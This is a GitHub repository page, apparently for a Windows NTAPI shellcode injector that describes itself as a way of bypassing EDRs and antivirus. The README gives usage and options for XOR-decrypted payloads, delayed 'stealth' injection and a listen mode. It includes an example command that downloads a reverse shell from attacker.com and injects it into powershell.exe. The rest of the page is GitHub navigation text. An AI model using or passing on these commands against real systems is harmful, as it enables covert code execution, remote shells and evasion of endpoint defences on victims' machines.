Windows NTAPI shellcode injector

Inject shellcode from memory to process using Windows NTAPI for bypassing EDRs and Antiviruses

Download shellcode from URL
Listen and wait for shellcode

Usage

Usage:
        Injector.exe -u <URL> [-k <xor_key>]
        Injector.exe -p <PID/Process Name> -u <URL> [-k <xor_key>]
        Injector.exe -p <PID/Process Name> -l <LISTEN_PORT> [-k <xor_key>]
        Injector.exe -h
Options:
        -h       Show this menu.
        -u       URL to donwload shellcode from (Not listen mode).
        -p       PID/Process name to be injected (Optional).
        -l       Listen mode port (Not download mode).
        -k       XOR key to use for decryption.
        -s       Stealth mode - the decryption and injection will start after given seconds (Default 18).
        -m       Injection mode - NT or normal(VirtualAllocEx, WriteProcessMemory, CreateRemoteThread).

Examples

Download and inject to powershell.exe

injector.exe -u http://attacker.com/reverse_shell.bin -p powershell.exe

Wait for connection on port 8080, receive shellcode and inject to owned notepad.exe

injector.exe -l 8080

Name		Name	Last commit message	Last commit date
Latest commit History 22 Commits
.vs/NativeInjection/v16		.vs/NativeInjection/v16
NativeInjection		NativeInjection
x64		x64
LICENSE		LICENSE
NativeInjection.sln		NativeInjection.sln
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

.vs/NativeInjection/v16

.vs/NativeInjection/v16

NativeInjection

NativeInjection

x64

x64

LICENSE

LICENSE

NativeInjection.sln

NativeInjection.sln

README.md

README.md

Repository files navigation

Windows NTAPI shellcode injector

Usage

Examples

About

Releases

Packages

Contributors 2

Languages

License

elddy/Windows-NTAPI-Injector

Folders and files

Latest commit

History

Repository files navigation

Windows NTAPI shellcode injector

Usage

Examples

About

Topics

Resources

License

Stars

Watchers

Forks

Languages